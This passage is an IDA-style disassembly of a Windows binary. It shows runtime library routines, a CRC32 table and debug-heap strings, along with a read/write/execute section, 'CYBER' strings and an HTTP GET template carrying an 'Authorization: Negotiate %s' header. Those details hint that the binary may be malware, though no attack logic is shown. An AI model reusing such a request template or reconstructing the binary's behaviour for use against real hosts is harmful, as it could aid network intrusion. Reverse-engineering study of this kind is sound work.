call ds:dword_4F54EC ; RaiseException
pop edi
pop esi
mov esp, ebp
pop ebp
retn 8
sub_43B240 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
and eax, 0FFFFh
cmp eax, 0FFFFh
jnz short loc_43B2AC
mov ax, [ebp+8]
jmp loc_43B351
; ---------------------------------------------------------------------------
loc_43B2AC: ; CODE XREF: _0:0043B2A1�j
cmp ds:dword_4F33F8, 0
jnz short loc_43B2E6
mov ecx, [ebp+8]
and ecx, 0FFFFh
cmp ecx, 41h
jl short loc_43B2E0
mov edx, [ebp+8]
and edx, 0FFFFh
cmp edx, 5Ah
jg short loc_43B2E0
mov eax, [ebp+8]
and eax, 0FFFFh
add eax, 20h
mov [ebp+8], ax
loc_43B2E0: ; CODE XREF: _0:0043B2C1�j _0:0043B2CF�j
mov ax, [ebp+8]
jmp short loc_43B351
; ---------------------------------------------------------------------------
loc_43B2E6: ; CODE XREF: _0:0043B2B3�j
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_43B318
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov dword ptr [ebp-4], 1
jmp short loc_43B31F
; ---------------------------------------------------------------------------
loc_43B318: ; CODE XREF: _0:0043B2F8�j
mov dword ptr [ebp-4], 0
loc_43B31F: ; CODE XREF: _0:0043B316�j
mov cx, [ebp+8]
push ecx
call sub_43B360
add esp, 4
mov [ebp+8], ax
cmp dword ptr [ebp-4], 0
jz short loc_43B342
push 13h
call sub_423320
add esp, 4
jmp short loc_43B34D
; ---------------------------------------------------------------------------
loc_43B342: ; CODE XREF: _0:0043B334�j
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_43B34D: ; CODE XREF: _0:0043B340�j
mov ax, [ebp+8]
loc_43B351: ; CODE XREF: _0:0043B2A7�j _0:0043B2E4�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B360 proc near ; CODE XREF: sub_43ACF0+11B�p
; sub_43ACF0+13F�p ...
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and eax, 0FFFFh
cmp eax, 0FFFFh
jnz short loc_43B37C
mov ax, word ptr [ebp+arg_0]
jmp loc_43B410
; ---------------------------------------------------------------------------
loc_43B37C: ; CODE XREF: sub_43B360+11�j
cmp ds:dword_4F33F8, 0
jnz short loc_43B3B6
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
cmp ecx, 41h
jl short loc_43B3B0
mov edx, [ebp+arg_0]
and edx, 0FFFFh
cmp edx, 5Ah
jg short loc_43B3B0
mov eax, [ebp+arg_0]
and eax, 0FFFFh
add eax, 20h
mov word ptr [ebp+arg_0], ax
loc_43B3B0: ; CODE XREF: sub_43B360+31�j
; sub_43B360+3F�j
mov ax, word ptr [ebp+arg_0]
jmp short loc_43B410
; ---------------------------------------------------------------------------
loc_43B3B6: ; CODE XREF: sub_43B360+23�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
cmp ecx, 100h
jge short loc_43B3E0
push 1
mov dx, word ptr [ebp+arg_0]
push edx
call sub_43B770
add esp, 8
test eax, eax
jnz short loc_43B3E0
mov ax, word ptr [ebp+arg_0]
jmp short loc_43B410
; ---------------------------------------------------------------------------
loc_43B3E0: ; CODE XREF: sub_43B360+65�j
; sub_43B360+78�j
push 0
push 1
lea eax, [ebp+var_4]
push eax
push 1
lea ecx, [ebp+arg_0]
push ecx
push 100h
mov edx, ds:dword_4F33F8
push edx
call sub_43B420
add esp, 1Ch
test eax, eax
jnz short loc_43B40C
mov ax, word ptr [ebp+arg_0]
jmp short loc_43B410
; ---------------------------------------------------------------------------
loc_43B40C: ; CODE XREF: sub_43B360+A4�j
mov ax, [ebp+var_4]
loc_43B410: ; CODE XREF: sub_43B360+17�j
; sub_43B360+54�j ...
mov esp, ebp
pop ebp
retn
sub_43B360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B420 proc near ; CODE XREF: sub_43B360+9A�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43E1A0
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F3698, 0
jnz short loc_43B4A6
push 0
push 0
push 1
push offset dword_43D410
push 100h
push 0
call ds:dword_4F5330 ; LCMapStringW
test eax, eax
jz short loc_43B477
mov ds:dword_4F3698, 1
jmp short loc_43B4A6
; ---------------------------------------------------------------------------
loc_43B477: ; CODE XREF: sub_43B420+49�j
push 0
push 0
push 1
push offset dword_43D40C
push 100h
push 0
call ds:dword_4F5334 ; LCMapStringA
test eax, eax
jz short loc_43B49F
mov ds:dword_4F3698, 2
jmp short loc_43B4A6
; ---------------------------------------------------------------------------
loc_43B49F: ; CODE XREF: sub_43B420+71�j
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B4A6: ; CODE XREF: sub_43B420+2D�j
; sub_43B420+55�j ...
cmp [ebp+arg_C], 0
jle short loc_43B4BF
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
call sub_43B710
add esp, 8
mov [ebp+arg_C], eax
loc_43B4BF: ; CODE XREF: sub_43B420+8A�j
cmp ds:dword_4F3698, 1
jnz short loc_43B4EB
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5330 ; LCMapStringW
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B4EB: ; CODE XREF: sub_43B420+A6�j
cmp ds:dword_4F3698, 2
jnz loc_43B6F1
cmp [ebp+arg_18], 0
jnz short loc_43B507
mov edx, ds:dword_4F3408
mov [ebp+arg_18], edx
loc_43B507: ; CODE XREF: sub_43B420+DC�j
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 220h
mov edx, [ebp+arg_18]
push edx
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_43B536
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B536: ; CODE XREF: sub_43B420+10D�j
mov [ebp+var_4], 0
mov eax, [ebp+var_20]
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_30], esp
mov [ebp+var_18], esp
mov eax, [ebp+var_30]
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_43B576
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_43B576: ; CODE XREF: sub_43B420+13D�j
cmp [ebp+var_1C], 0
jnz short loc_43B583
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B583: ; CODE XREF: sub_43B420+15A�j
push 0
push 0
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 220h
mov edx, [ebp+arg_18]
push edx
call ds:dword_4F5450 ; WideCharToMultiByte
test eax, eax
jnz short loc_43B5B1
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B5B1: ; CODE XREF: sub_43B420+188�j
push 0
push 0
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5334 ; LCMapStringA
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_43B5DB
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B5DB: ; CODE XREF: sub_43B420+1B2�j
mov [ebp+var_4], 1
mov eax, [ebp+var_2C]
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_34], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_34]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_43B61B
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_43B61B: ; CODE XREF: sub_43B420+1E2�j
cmp [ebp+var_24], 0
jnz short loc_43B628
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B628: ; CODE XREF: sub_43B420+1FF�j
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5334 ; LCMapStringA
test eax, eax
jnz short loc_43B651
xor eax, eax
jmp loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B651: ; CODE XREF: sub_43B420+228�j
mov edx, [ebp+arg_4]
and edx, 400h
test edx, edx
jz short loc_43B696
mov eax, [ebp+var_2C]
mov [ebp+var_28], eax
cmp [ebp+arg_14], 0
jz short loc_43B694
mov ecx, [ebp+arg_14]
cmp ecx, [ebp+var_2C]
jge short loc_43B67A
mov edx, [ebp+arg_14]
mov [ebp+var_38], edx
jmp short loc_43B680
; ---------------------------------------------------------------------------
loc_43B67A: ; CODE XREF: sub_43B420+250�j
mov eax, [ebp+var_2C]
mov [ebp+var_38], eax
loc_43B680: ; CODE XREF: sub_43B420+258�j
mov ecx, [ebp+var_38]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_10]
push eax
call sub_41E510
add esp, 0Ch
loc_43B694: ; CODE XREF: sub_43B420+248�j
jmp short loc_43B6EC
; ---------------------------------------------------------------------------
loc_43B696: ; CODE XREF: sub_43B420+23C�j
cmp [ebp+arg_14], 0
jnz short loc_43B6C3
push 0
push 0
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_24]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_43B6C1
xor eax, eax
jmp short loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B6C1: ; CODE XREF: sub_43B420+29B�j
jmp short loc_43B6EC
; ---------------------------------------------------------------------------
loc_43B6C3: ; CODE XREF: sub_43B420+27A�j
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_24]
push ecx
push 1
mov edx, [ebp+arg_18]
push edx
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_43B6EC
xor eax, eax
jmp short loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B6EC: ; CODE XREF: sub_43B420:loc_43B694�j
; sub_43B420:loc_43B6C1�j ...
mov eax, [ebp+var_28]
jmp short loc_43B6F3
; ---------------------------------------------------------------------------
loc_43B6F1: ; CODE XREF: sub_43B420+D2�j
xor eax, eax
loc_43B6F3: ; CODE XREF: sub_43B420+81�j
; sub_43B420+C6�j ...
lea esp, [ebp-44h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43B420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B710 proc near ; CODE XREF: sub_43B420+94�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
loc_43B722: ; CODE XREF: sub_43B710+37�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
test edx, edx
jz short loc_43B749
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
test edx, edx
jz short loc_43B749
mov eax, [ebp+var_4]
add eax, 2
mov [ebp+var_4], eax
jmp short loc_43B722
; ---------------------------------------------------------------------------
loc_43B749: ; CODE XREF: sub_43B710+20�j
; sub_43B710+2C�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
test edx, edx
jnz short loc_43B75F
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
sar eax, 1
jmp short loc_43B762
; ---------------------------------------------------------------------------
loc_43B75F: ; CODE XREF: sub_43B710+43�j
mov eax, [ebp+arg_4]
loc_43B762: ; CODE XREF: sub_43B710+4D�j
mov esp, ebp
pop ebp
retn
sub_43B710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B770 proc near ; CODE XREF: sub_43B360+6E�p
; _0:0043B7FD�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and eax, 0FFFFh
cmp eax, 0FFFFh
jnz short loc_43B787
xor eax, eax
jmp short loc_43B7E3
; ---------------------------------------------------------------------------
loc_43B787: ; CODE XREF: sub_43B770+11�j
mov ecx, [ebp+arg_0]
and ecx, 0FFFFh
cmp ecx, 100h
jge short loc_43B7B0
mov edx, [ebp+arg_0]
and edx, 0FFFFh
mov eax, ds:off_453BE8
mov cx, [eax+edx*2]
mov word ptr [ebp+var_4], cx
jmp short loc_43B7D0
; ---------------------------------------------------------------------------
loc_43B7B0: ; CODE XREF: sub_43B770+26�j
push 0
push 0
lea edx, [ebp+var_4]
push edx
push 1
lea eax, [ebp+arg_0]
push eax
push 1
call sub_438CA0
add esp, 18h
test eax, eax
jnz short loc_43B7D0
xor eax, eax
jmp short loc_43B7E3
; ---------------------------------------------------------------------------
loc_43B7D0: ; CODE XREF: sub_43B770+3E�j
; sub_43B770+5A�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
mov ecx, [ebp+arg_4]
and ecx, 0FFFFh
and eax, ecx
loc_43B7E3: ; CODE XREF: sub_43B770+15�j
; sub_43B770+5E�j
mov esp, ebp
pop ebp
retn
sub_43B770 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov ax, [ebp+0Ch]
push eax
mov cx, [ebp+8]
push ecx
call sub_43B770
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
loc_43B810: ; DATA XREF: _1:0043E344�o
lea ecx, [ebp-3Ch]
jmp sub_40DC3D
; ---------------------------------------------------------------------------
mov eax, [ebp-24h]
and eax, 1
test eax, eax
jz locret_43B82E
mov ecx, [ebp+8]
jmp sub_40DC3D
; ---------------------------------------------------------------------------
locret_43B82E: ; CODE XREF: _0:0043B820�j
retn
; ---------------------------------------------------------------------------
loc_43B82F: ; DATA XREF: sub_40D7E4�o
mov eax, offset dword_43E348
jmp sub_420420
; ---------------------------------------------------------------------------
lea ecx, [ebp+14h]
jmp sub_40DC3D
; ---------------------------------------------------------------------------
loc_43B841: ; DATA XREF: _1:0043E370�o
lea ecx, [ebp-1Ch]
jmp sub_40DC3D
; ---------------------------------------------------------------------------
loc_43B849: ; DATA XREF: sub_40D95B�o
mov eax, offset dword_43E374
jmp sub_420420
; ---------------------------------------------------------------------------
align 4
loc_43B854: ; DATA XREF: sub_40E056�o
mov eax, offset dword_43E3C4
jmp sub_420420
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-38h]
call sub_40DC3D
retn
; =============== S U B R O U T I N E =======================================
SEH_43A460 proc near ; DATA XREF: sub_43A460+5�o
mov eax, offset dword_43E460
jmp sub_420420
SEH_43A460 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
call sub_43B080
retn
; =============== S U B R O U T I N E =======================================
SEH_43A4C0 proc near ; DATA XREF: sub_43A4C0+5�o
mov eax, offset dword_43E488
jmp sub_420420
SEH_43A4C0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
call sub_43B080
retn
; =============== S U B R O U T I N E =======================================
SEH_43A580 proc near ; DATA XREF: sub_43A580+5�o
mov eax, offset dword_43E4D0
jmp sub_420420
SEH_43A580 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-14h]
call sub_43B080
retn
; =============== S U B R O U T I N E =======================================
SEH_43A640 proc near ; DATA XREF: sub_43A640+5�o
mov eax, offset dword_43E4F8
jmp sub_420420
SEH_43A640 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-38h]
call sub_40DC3D
retn
; =============== S U B R O U T I N E =======================================
SEH_43A760 proc near ; DATA XREF: sub_43A760+5�o
mov eax, offset dword_43E560
jmp sub_420420
SEH_43A760 endp
_0 ends
; Section 2. (virtual address 0003C000)
; Virtual size : 00002588 ( 9608.)
; Section size in file : 00002588 ( 9608.)
; Offset to raw data for section: 0003C000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_1 segment para public 'CODE' use32
assume cs:_1
;org 43C000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 0
dd 469D99F3h, 0
dd 2, 61h, 0
dd 59800h, 0
dword_43C020 dd 0 ; DATA XREF: sub_401071+24�r
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
aCyber db 'CYBER',0 ; DATA XREF: sub_401C87+3477�o
; sub_401C87+355A�o ...
align 4
aCyber_0 db 'CYBER',0 ; DATA XREF: sub_401C87+387E�o
; sub_401C87+38BA�o ...
align 10h
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40D95B+68�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
dbl_43C470 dq 1.388888888888889e-2 ; DATA XREF: sub_40D798+2F�r
dbl_43C478 dq 1.666666666666667e-1 ; DATA XREF: sub_40D798+15�r
dbl_43C480 dq 1.333333333333333 ; DATA XREF: sub_40D7E4+70�r
dword_43C488 dd 0 ; DATA XREF: sub_40DCD7:loc_40DF40�o
flt_43C48C dd 5.0e-1 ; DATA XREF: sub_40E29B+38F�r
dbl_43C490 dq 9.765625e-4 ; DATA XREF: sub_416D68+2B8�r
; sub_416D68+2CD�r ...
dbl_43C498 dq -1.52587890625e-4 ; DATA XREF: sub_418428+3D3�r
dbl_43C4A0 dq 3.0517578125e-4 ; DATA XREF: sub_418428+3B4�r
dbl_43C4A8 dq -3.0517578125e-4 ; DATA XREF: sub_418428+332�r
; sub_418428+396�r
dbl_43C4B0 dq 1.52587890625e-4 ; DATA XREF: sub_418428+26D�r
dbl_43C4B8 dq -1.739501953125e-3 ; DATA XREF: sub_418428+248�r
; sub_418428+2D1�r ...
dbl_43C4C0 dq 3.11279296875e-3 ; DATA XREF: sub_418428+E1�r
dbl_43C4C8 dq 3.0517578125e-5 ; DATA XREF: sub_418428+AE�r
; sub_418428+137�r ...
dbl_43C4D0 dq 6.103515625e-5 ; DATA XREF: sub_418428+93�r
; sub_418428+2FD�r
dbl_43C4D8 dq 2.288818359375e-3 ; DATA XREF: sub_418428+21�r
dbl_43C4E0 dq -3.0517578125e-5 ; DATA XREF: sub_419313+2B�r
flt_43C4E8 dd 9.765625e-4 ; DATA XREF: sub_41B161+1B0�r
flt_43C4EC dd 8.0 ; DATA XREF: sub_41B161+1AA�r
flt_43C4F0 dd 0.0 ; DATA XREF: sub_41B161+16F�r
flt_43C4F4 dd 1.0e-3 ; DATA XREF: sub_41B161+166�r
dword_43C4F8 dd 6F6C6366h, 632E6573h, 0 ; DATA XREF: sub_41BCF0+1D�o
; sub_41BD80+25�o
dword_43C504 dd 65727473h, 21206D61h, 554E203Dh, 4C4Ch ; DATA XREF: sub_41BCF0+14�o
; sub_420FE0+D�o ...
dword_43C514 dd 20727473h, 4E203D21h, 4C4C55h, 65696C43h, 746Eh, 6F6E6749h
; DATA XREF: sub_41BD80+1C�o
; sub_41EFB0+45�o ...
dd 6572h, 545243h, 6D726F4Eh, 6C61h
aFree db 'Free',0 ; DATA XREF: _2:off_4517F0�o
align 8
dword_43C548 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41BEC0+5�o
dd offset sub_41BF1D
aErrorMemoryAll db 'Error: memory allocation: bad memory block type.',0Ah,0
; DATA XREF: sub_41BF80:loc_41C0EA�o
; sub_41C3F0:loc_41C570�o
align 4
aInvalidAllocat db 'Invalid allocation size: %u bytes.',0Ah,0 ; DATA XREF: sub_41BF80+11B�o
aS_19 db '%s',0 ; DATA XREF: sub_41BF80+BC�o
; sub_41BF80+16F�o ...
align 10h
aClientHookAl_0 db 'Client hook allocation failure.',0Ah,0
; DATA XREF: sub_41BF80:loc_41C037�o
align 4
aClientHookAllo db 'Client hook allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: sub_41BF80+94�o
align 4
aDbgheap_c db 'dbgheap.c',0 ; DATA XREF: sub_41BF80+31�o
; sub_41C3F0+77�o ...
align 4
a_crtcheckmemor db '_CrtCheckMemory()',0 ; DATA XREF: sub_41BF80+25�o
; sub_41C3F0+6B�o ...
align 10h
dword_43C630 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41C360+5�o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dw 41h
a_pfirstblockPo db '_pFirstBlock == pOldBlock',0 ; DATA XREF: sub_41C3F0+499�o
align 4
a_plastblockPol db '_pLastBlock == pOldBlock',0 ; DATA XREF: sub_41C3F0+445�o
align 4
aFreallocFreall db 'fRealloc || (!fRealloc && pNewBlock == pOldBlock)',0
; DATA XREF: sub_41C3F0:loc_41C7D6�o
align 4
a_block_typePol db '_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLOCK_TYPE(nBlockUse)',0
; DATA XREF: sub_41C3F0+277�o
align 4
aPoldblockNline db 'pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_'
; DATA XREF: sub_41C3F0:loc_41C601�o
db 'REQ',0
align 4
a_crtisvalidhea db '_CrtIsValidHeapPointer(pUserData)',0 ; DATA XREF: sub_41C3F0+1B6�o
; sub_41CA80+A8�o ...
align 10h
aAllocationTooL db 'Allocation too large or negative: %u bytes.',0Ah,0
; DATA XREF: sub_41C3F0+136�o
align 10h
aClientHookRe_0 db 'Client hook re-allocation failure.',0Ah,0
; DATA XREF: sub_41C3F0:loc_41C4EF�o
aClientHookReAl db 'Client hook re-allocation failure at file %hs line %d.',0Ah,0
; DATA XREF: sub_41C3F0+DC�o
align 10h
dword_43C7E0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41C940+5�o
dd offset sub_41C9A3
align 10h
dword_43C7F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41CA10+5�o
dd offset sub_41CA62
a_pfirstblockPh db '_pFirstBlock == pHead',0 ; DATA XREF: sub_41CA80+35D�o
align 4
a_plastblockPhe db '_pLastBlock == pHead',0 ; DATA XREF: sub_41CA80+307�o
align 4
aPheadNblockuse db 'pHead->nBlockUse == nBlockUse',0 ; DATA XREF: sub_41CA80+29C�o
; sub_41CE90+133�o
align 4
aPheadNlineIgno db 'pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ',0
; DATA XREF: sub_41CA80:loc_41CCA4�o
align 4
aDamageAfterHsB db 'DAMAGE: after %hs block (#%d) at 0x%08X.',0Ah,0
; DATA XREF: sub_41CA80+1E5�o
; sub_41D1D0+265�o
align 4
aDamageBeforeHs db 'DAMAGE: before %hs block (#%d) at 0x%08X.',0Ah,0
